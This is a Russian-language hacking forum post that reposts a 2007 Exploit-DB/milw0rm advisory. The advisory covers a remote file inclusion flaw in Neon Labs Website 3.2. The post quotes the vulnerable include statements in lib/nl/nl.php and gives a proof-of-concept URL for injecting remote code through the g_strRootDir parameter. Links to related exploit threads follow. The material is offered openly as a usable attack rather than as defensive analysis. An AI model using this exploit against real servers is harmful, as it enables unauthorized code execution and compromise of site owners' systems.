Exploit Neon Labs Website 3.2 - 'nl.php?g_strRootDir' Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3163
Проверка EDB
  1. Пройдено
Автор
3L3CTRIC-CRACKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-0496
Дата публикации
2007-01-20
Код: 
------------------------------------------------------------------------------------------------------------------------
Script:nlws
Affected Version:3.2
Downlaoad:http://neonlabs.structum.com.mx/pkgs/nlws_3-2.zip
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (lib/nl/nl.php)
Vul Code;
include($g_strRootDir.$g_strLibDir."nl/nlsite.php");
include($g_strRootDir.$g_strLibDir."nl/nltable.php");
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/lib/nl/nl.php?g_strRootDir=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-20]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Neon WebDAV Client Library 0.2x - Format String
Ответы
0
Просмотры
374
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NeoSys Neon Webmail for Java 5.06/5.07 - 'updateuser?in_name' Servlet Cross-Site Scripting
Ответы
0
Просмотры
355
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NeoSys Neon Webmail for Java 5.06/5.07 - 'updateuser?in_id' Servlet Arbitrary User Information Modification
Ответы
0
Просмотры
363
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NeoSys Neon Webmail for Java 5.06/5.07 - 'maillist' Servlet Multiple SQL Injections
Ответы
0
Просмотры
365
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NeoSys Neon Webmail for Java 5.06/5.07 - 'addrlist' Servlet Multiple SQL Injections
Ответы
0
Просмотры
346
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NeoSys Neon Webmail for Java 5.06/5.07 - 'downloadfile' Servlet Traversal Arbitrary File Access
Ответы
0
Просмотры
347
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NeoSys Neon Webmail for Java 5.06/5.07 - 'updatemail' Servlet Arbitrary Mail Message Manipulation
Ответы
0
Просмотры
357
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Neon Responders 5.4 - Remote Clock Synchronization Denial of Service
Ответы
0
Просмотры
345
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zone Labs ZoneAlarm 2.1 Personal Firewall - Port 67
Ответы
0
Просмотры
464
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure
Ответы
0
Просмотры
420
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу